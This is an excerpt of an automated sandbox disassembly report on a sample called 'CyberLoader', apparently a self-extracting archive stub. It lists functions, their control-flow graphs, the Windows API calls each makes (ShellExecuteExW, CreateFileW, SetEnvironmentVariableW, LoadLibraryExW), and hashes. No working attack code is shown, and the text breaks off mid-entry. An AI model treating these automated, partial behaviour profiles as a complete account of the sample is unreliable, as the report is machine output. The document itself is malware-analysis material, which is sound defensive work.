                                                  control_flow_graph 796 28ce22-28ce3a call 28e360 799 28d08b-28d093 796->799 800 28ce40-28ce4c call 2935b3 796->800 800->799 803 28ce52-28ce7a call 28f350 800->803 806 28ce7c 803->806 807 28ce84-28ce91 803->807 806->807 808 28ce93 807->808 809 28ce95-28ce9e 807->809 808->809 810 28cea0-28cea2 809->810 811 28ced6 809->811 812 28ceaa-28cead 810->812 813 28ceda-28cedd 811->813 816 28d03c-28d041 812->816 817 28ceb3-28cebb 812->817 814 28cedf-28cee2 813->814 815 28cee4-28cee6 813->815 814->815 818 28cef9-28cf0e call 27b493 814->818 815->818 819 28cee8-28ceef 815->819 822 28d043 816->822 823 28d036-28d03a 816->823 820 28cec1-28cec7 817->820 821 28d055-28d05d 817->821 831 28cf10-28cf1d call 2817ac 818->831 832 28cf27-28cf32 call 27a180 818->832 819->818 824 28cef1 819->824 820->821 828 28cecd-28ced4 820->828 825 28d05f-28d061 821->825 826 28d065-28d06d 821->826 829 28d048-28d04c 822->829 823->816 823->829 824->818 825->826 826->813 828->811 828->812 829->821 831->832 837 28cf1f 831->837 838 28cf4f-28cf5c ShellExecuteExW 832->838 839 28cf34-28cf4b call 27b239 832->839 837->832 840 28d08a 838->840 841 28cf62-28cf6f 838->841 839->838 840->799 844 28cf71-28cf78 841->844 845 28cf82-28cf84 841->845 844->845 846 28cf7a-28cf80 844->846 847 28cf9b-28cfba call 28d2e6 845->847 848 28cf86-28cf8f 845->848 846->845 849 28cff1-28cffd CloseHandle 846->849 847->849 866 28cfbc-28cfc4 847->866 848->847 857 28cf91-28cf99 ShowWindow 848->857 850 28d00e-28d01c 849->850 851 28cfff-28d00c call 2817ac 849->851 855 28d079-28d07b 850->855 856 28d01e-28d020 850->856 851->850 863 28d072 851->863 855->840 860 28d07d-28d07f 855->860 856->855 861 28d022-28d028 856->861 857->847 860->840 864 28d081-28d084 ShowWindow 860->864 861->855 865 28d02a-28d034 861->865 863->855 864->840 865->855 866->849 867 28cfc6-28cfd7 GetExitCodeProcess 866->867 867->849 868 28cfd9-28cfe3 867->868 869 28cfea 868->869 870 28cfe5 868->870 869->849 870->869
                                                  APIs
                                                  • ShellExecuteExW.SHELL32(?), ref: 0028CF54
                                                  • ShowWindow.USER32(?,00000000), ref: 0028CF93
                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 0028CFCF
                                                  • CloseHandle.KERNEL32(?), ref: 0028CFF5
                                                  • ShowWindow.USER32(?,00000001), ref: 0028D084
                                                    • Part of subcall function 002817AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0027BB05,00000000,.exe,?,?,00000800,?,?,002885DF,?), ref: 002817C2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
                                                  • String ID: $.exe$.inf
                                                  • API String ID: 3686203788-2452507128
                                                  • Opcode ID: a48723b21a4991050a4923ce673aa0b1cc751e6388ffa2a8ce52d2b6b13762bf
                                                  • Instruction ID: 8dd148d098ecf28c425c18b4924fc7ee4f8d8633b25d66ea44ecce1bfa87bbc2
                                                  • Opcode Fuzzy Hash: a48723b21a4991050a4923ce673aa0b1cc751e6388ffa2a8ce52d2b6b13762bf
                                                  • Instruction Fuzzy Hash: C061197842A3829BDB31BF24D8046ABB7F5EF95300F14481EF5C4971D1D7B189A9CB61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0029A058 Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 871 29a058-29a071 872 29a073-29a083 call 29e6ed 871->872 873 29a087-29a08c 871->873 872->873 881 29a085 872->881 875 29a099-29a0bd MultiByteToWideChar 873->875 876 29a08e-29a096 873->876 878 29a250-29a263 call 28ec4a 875->878 879 29a0c3-29a0cf 875->879 876->875 882 29a0d1-29a0e2 879->882 883 29a123 879->883 881->873 884 29a101-29a112 call 298518 882->884 885 29a0e4-29a0f3 call 2a1a30 882->885 887 29a125-29a127 883->887 891 29a245 884->891 897 29a118 884->897 885->891 896 29a0f9-29a0ff 885->896 890 29a12d-29a140 MultiByteToWideChar 887->890 887->891 890->891 894 29a146-29a158 call 29a72c 890->894 895 29a247-29a24e call 29a2c0 891->895 901 29a15d-29a161 894->901 895->878 900 29a11e-29a121 896->900 897->900 900->887 901->891 903 29a167-29a16e 901->903 904 29a1a8-29a1b4 903->904 905 29a170-29a175 903->905 907 29a200 904->907 908 29a1b6-29a1c7 904->908 905->895 906 29a17b-29a17d 905->906 906->891 909 29a183-29a19d call 29a72c 906->909 910 29a202-29a204 907->910 911 29a1c9-29a1d8 call 2a1a30 908->911 912 29a1e2-29a1f3 call 298518 908->912 909->895 923 29a1a3 909->923 914 29a23e-29a244 call 29a2c0 910->914 915 29a206-29a21f call 29a72c 910->915 911->914 926 29a1da-29a1e0 911->926 912->914 927 29a1f5 912->927 914->891 915->914 929 29a221-29a228 915->929 923->891 928 29a1fb-29a1fe 926->928 927->928 928->910 930 29a22a-29a22b 929->930 931 29a264-29a26a 929->931 932 29a22c-29a23c WideCharToMultiByte 930->932 931->932 932->914 933 29a26c-29a273 call 29a2c0 932->933 933->895
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00294E35,00294E35,?,?,?,0029A2A9,00000001,00000001,3FE85006), ref: 0029A0B2
                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0029A2A9,00000001,00000001,3FE85006,?,?,?), ref: 0029A138
                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0029A232
                                                  • __freea.LIBCMT ref: 0029A23F
                                                    • Part of subcall function 00298518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0029C13D,00000000,?,002967E2,?,00000008,?,002989AD,?,?,?), ref: 0029854A
                                                  • __freea.LIBCMT ref: 0029A248
                                                  • __freea.LIBCMT ref: 0029A26D
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1414292761-0
                                                  • Opcode ID: 588aa5f33c057323cfe3a7e07c7de31f270f6dd4f92aaec6e706977161e436a1
                                                  • Instruction ID: d1df2fd39f70fc2c1b8e65abb24e48babe64ddf3d29e2a6f44e69bbd5bbc3b9c
                                                  • Opcode Fuzzy Hash: 588aa5f33c057323cfe3a7e07c7de31f270f6dd4f92aaec6e706977161e436a1
                                                  • Instruction Fuzzy Hash: 9951BF72A20316AFDF258F64CC42EBB77AAEB41750F154229FC08D6180DB75DC608AE2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028A335 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35comCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 00280085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 002800A0
                                                    • Part of subcall function 00280085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0027EB86,Crypt32.dll,00000000,0027EC0A,?,?,0027EBEC,?,?,?), ref: 002800C2
                                                  • OleInitialize.OLE32(00000000), ref: 0028A34E
                                                  • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0028A385
                                                  • SHGetMalloc.SHELL32(002B8430), ref: 0028A38F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                  • String ID: riched20.dll$3To
                                                  • API String ID: 3498096277-2168385784
                                                  • Opcode ID: c7865b262fe9adf983a87bcc4fa407adb168e5d9f6175cbd37ab4a0416fa9ebe
                                                  • Instruction ID: 984c0da90b1445597eb68fd2cfb0d5cae76f0202ac019e0cf42353775d77eb58
                                                  • Opcode Fuzzy Hash: c7865b262fe9adf983a87bcc4fa407adb168e5d9f6175cbd37ab4a0416fa9ebe
                                                  • Instruction Fuzzy Hash: 30F03CB1C01209ABCB10AF9998499EFFBFCEBA5701F00415AE854A2241CBB446098FA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 002799B0 Relevance: 7.6, APIs: 5, Instructions: 117filetimeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 940 2799b0-2799d1 call 28e360 943 2799d3-2799d6 940->943 944 2799dc 940->944 943->944 945 2799d8-2799da 943->945 946 2799de-2799fb 944->946 945->946 947 279a03-279a0d 946->947 948 2799fd 946->948 949 279a12-279a31 call 2770bf 947->949 950 279a0f 947->950 948->947 953 279a33 949->953 954 279a39-279a57 CreateFileW 949->954 950->949 953->954 955 279abb-279ac0 954->955 956 279a59-279a7b GetLastError call 27b66c 954->956 957 279ac2-279ac5 955->957 958 279ae1-279af5 955->958 965 279a7d-279a9f CreateFileW GetLastError 956->965 966 279aaa-279aaf 956->966 957->958 960 279ac7-279adb SetFileTime 957->960 961 279af7-279b0f call 27fe56 958->961 962 279b13-279b1e 958->962 960->958 961->962 968 279aa5-279aa8 965->968 969 279aa1 965->969 966->955 970 279ab1 966->970 968->955 968->966 969->968 970->955
                                                  APIs
                                                  • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,002778AD,?,00000005,?,00000011), ref: 00279A4C
                                                  • GetLastError.KERNEL32(?,?,002778AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00279A59
                                                  • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,002778AD,?,00000005,?), ref: 00279A8E
                                                  • GetLastError.KERNEL32(?,?,002778AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00279A96
                                                  • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,002778AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00279ADB
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: File$CreateErrorLast$Time
                                                  • String ID:
                                                  • API String ID: 1999340476-0
                                                  • Opcode ID: 05cba0f7b412ea674ed4d066e747b3e097fa73b6610cc3cfe0d13b0798ebccd0
                                                  • Instruction ID: 84d42956524ec73143e0a11163e8bdc4b6c4a1fdba4f951c2fa10a9c9e6f7c6c
                                                  • Opcode Fuzzy Hash: 05cba0f7b412ea674ed4d066e747b3e097fa73b6610cc3cfe0d13b0798ebccd0
                                                  • Instruction Fuzzy Hash: B34166305557466FE320CF24DC0ABDABBD4BB01324F104719F6E8921D1E7B4A9E8CB95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028A2C7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 999 28a2c7-28a2e6 GetClassNameW 1000 28a2e8-28a2fd call 2817ac 999->1000 1001 28a30e-28a310 999->1001 1006 28a30d 1000->1006 1007 28a2ff-28a30b FindWindowExW 1000->1007 1003 28a31b-28a31f 1001->1003 1004 28a312-28a315 SHAutoComplete 1001->1004 1004->1003 1006->1001 1007->1006
                                                  APIs
                                                  • GetClassNameW.USER32(?,?,00000050), ref: 0028A2DE
                                                  • SHAutoComplete.SHLWAPI(?,00000010), ref: 0028A315
                                                    • Part of subcall function 002817AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0027BB05,00000000,.exe,?,?,00000800,?,?,002885DF,?), ref: 002817C2
                                                  • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0028A305
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                  • String ID: EDIT
                                                  • API String ID: 4243998846-3080729518
                                                  • Opcode ID: b945a8a77452bedb28e84a3776f69f667a87552f2bf74a4e1dff7cc306fe3dc7
                                                  • Instruction ID: 35b04ef581791e7e1256f5498f5f4304a65ad8a3e430389abd833a39e2ef7571
                                                  • Opcode Fuzzy Hash: b945a8a77452bedb28e84a3776f69f667a87552f2bf74a4e1dff7cc306fe3dc7
                                                  • Instruction Fuzzy Hash: EFF08236E22228BBE7206A64AC09F9B776C9B56B11F080097BD05A21C0DB609D65C6F6
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028D287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1008 28d287-28d2b2 call 28e360 SetEnvironmentVariableW call 27fbd8 1012 28d2b7-28d2bb 1008->1012 1013 28d2bd-28d2c1 1012->1013 1014 28d2df-28d2e3 1012->1014 1015 28d2ca-28d2d1 call 27fcf1 1013->1015 1018 28d2c3-28d2c9 1015->1018 1019 28d2d3-28d2d9 SetEnvironmentVariableW 1015->1019 1018->1015 1019->1014
                                                  APIs
                                                  • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0028D29D
                                                  • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0028D2D9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: EnvironmentVariable
                                                  • String ID: sfxcmd$sfxpar
                                                  • API String ID: 1431749950-3493335439
                                                  • Opcode ID: 5363a57507833b6d59c4a0ec02d1983a6a5f29eccd22884d58a918e9272ba250
                                                  • Instruction ID: f22e564968876da5f275b3a6f212dc37aca1fb05d6cc41e3444d06b28f28a235
                                                  • Opcode Fuzzy Hash: 5363a57507833b6d59c4a0ec02d1983a6a5f29eccd22884d58a918e9272ba250
                                                  • Instruction Fuzzy Hash: DFF0A776821238A7DB207F919C09ABA7798AF0B751B014456FC4896182DA70CD60DBF1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0027984E Relevance: 6.1, APIs: 4, Instructions: 57fileCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1020 27984e-27985a 1021 279867-27987e ReadFile 1020->1021 1022 27985c-279864 GetStdHandle 1020->1022 1023 279880-279889 call 279989 1021->1023 1024 2798da 1021->1024 1022->1021 1028 2798a2-2798a6 1023->1028 1029 27988b-279893 1023->1029 1026 2798dd-2798e2 1024->1026 1031 2798b7-2798bb 1028->1031 1032 2798a8-2798b1 GetLastError 1028->1032 1029->1028 1030 279895 1029->1030 1036 279896-2798a0 call 27984e 1030->1036 1034 2798d5-2798d8 1031->1034 1035 2798bd-2798c5 1031->1035 1032->1031 1033 2798b3-2798b5 1032->1033 1033->1026 1034->1026 1035->1034 1037 2798c7-2798d0 GetLastError 1035->1037 1036->1026 1037->1034 1039 2798d2-2798d3 1037->1039 1039->1036
                                                  APIs
                                                  • GetStdHandle.KERNEL32(000000F6), ref: 0027985E
                                                  • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00279876
                                                  • GetLastError.KERNEL32 ref: 002798A8
                                                  • GetLastError.KERNEL32 ref: 002798C7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$FileHandleRead
                                                  • String ID:
                                                  • API String ID: 2244327787-0
                                                  • Opcode ID: 8e24f5728dedddfbe2a3da043b9b536da0459345851b0c1245e1a9ecc5d8edba
                                                  • Instruction ID: 99845c7217d748c88603297516abf6cd902406c85a2ad437cd6b6eb8b79e0e53
                                                  • Opcode Fuzzy Hash: 8e24f5728dedddfbe2a3da043b9b536da0459345851b0c1245e1a9ecc5d8edba
                                                  • Instruction Fuzzy Hash: E611A030920305EBDB209F5AD808A6977A8EF0B730F10C12AF42E85690DB759EA09F53
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0029A4F4 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1041 29a4f4-29a508 1042 29a50a-29a513 1041->1042 1043 29a515-29a530 LoadLibraryExW 1041->1043 1044 29a56c-29a56e 1042->1044 1045 29a559-29a55f 1043->1045 1046 29a532-29a53b GetLastError 1043->1046 1049 29a568 1045->1049 1050 29a561-29a562 FreeLibrary 1045->1050 1047 29a54a 1046->1047 1048 29a53d-29a548 LoadLibraryExW 1046->1048 1051 29a54c-29a54e 1047->1051 1048->1051 1052 29a56a-29a56b 1049->1052 1050->1049 1051->1045 1053 29a550-29a557 1051->1053 1052->1044 1053->1052
                                                  APIs
                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00293713,00000000,00000000,?,0029A49B,00293713,00000000,00000000,00000000,?,0029A698,00000006,FlsSetValue), ref: 0029A526
                                                  • GetLastError.KERNEL32(?,0029A49B,00293713,00000000,00000000,00000000,?,0029A698,00000006,FlsSetValue,002A7348,002A7350,00000000,00000364,?,00299077), ref: 0029A532
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0029A49B,00293713,00000000,00000000,00000000,?,0029A698,00000006,FlsSetValue,002A7348,002A7350,00000000), ref: 0029A540
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad$ErrorLast
                                                  • String ID:
                                                  • API String ID: 3177248105-0
                                                  • Opcode ID: 23a0270d99b81f5d43cbc7accd51c0816f103cb66023c538bd87dba2852956fc
                                                  • Instruction ID: 4c57cb26061b058b6fc9e948d53199eae602eb3a60fae18a6abd6ebc41c69792
                                                  • Opcode Fuzzy Hash: 23a0270d99b81f5d43cbc7accd51c0816f103cb66023c538bd87dba2852956fc
                                                  • Instruction Fuzzy Hash: 3401FC32F31323ABCF218E6CAC48A667798AF467A17660520F90AD3140DB31D910CAD1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0029B188 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00298FA5: GetLastError.KERNEL32(?,002B0EE8,00293E14,002B0EE8,?,?,00293713,00000050,?,002B0EE8,00000200), ref: 00298FA9
                                                    • Part of subcall function 00298FA5: _free.LIBCMT ref: 00298FDC
                                                    • Part of subcall function 00298FA5: SetLastError.KERNEL32(00000000,?,002B0EE8,00000200), ref: 0029901D
                                                    • Part of subcall function 00298FA5: _abort.LIBCMT ref: 00299023
                                                    • Part of subcall function 0029B2AE: _abort.LIBCMT ref: 0029B2E0
                                                    • Part of subcall function 0029B2AE: _free.LIBCMT ref: 0029B314
                                                    • Part of subcall function 0029AF1B: GetOEMCP.KERNEL32(00000000,?,?,0029B1A5,?), ref: 0029AF46
                                                  • _free.LIBCMT ref: 0029B200
                                                  • _free.LIBCMT ref: 0029B236
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorLast_abort
                                                  • String ID: *
                                                  • API String ID: 2991157371-3442289017
                                                  • Opcode ID: 138b8b5e9530f0575c6ac755f68279772c900b05b1a062b904154a070606f008
                                                  • Instruction ID: 70b1b3f1393244127c433c54416eff8deb138a70434044026f90105c9d86bdbd
                                                  • Opcode Fuzzy Hash: 138b8b5e9530f0575c6ac755f68279772c900b05b1a062b904154a070606f008
                                                  • Instruction Fuzzy Hash: F2313831910209AFDF11EFA8E945B6DB7F4EF02320F2500A9E8089B291EF719D51CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00279F2F Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,0027CC94,00000001,?,?,?,00000000,00284ECD,?,?,?), ref: 00279F4C
                                                  • WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,00284ECD,?,?,?,?,?,00284972,?), ref: 00279F8E
                                                  • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,0027CC94,00000001,?,?), ref: 00279FB8
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: FileWrite$Handle
                                                  • String ID:
                                                  • API String ID: 4209713984-0
                                                  • Opcode ID: 4f83e4effc53155d1a8f52a20d6091c1a5483489ad08b615fc1a61987d4f9904
                                                  • Instruction ID: 496284117fa2f52177de0a85db00b4932ee17fe3020542182ff37b048c5026af
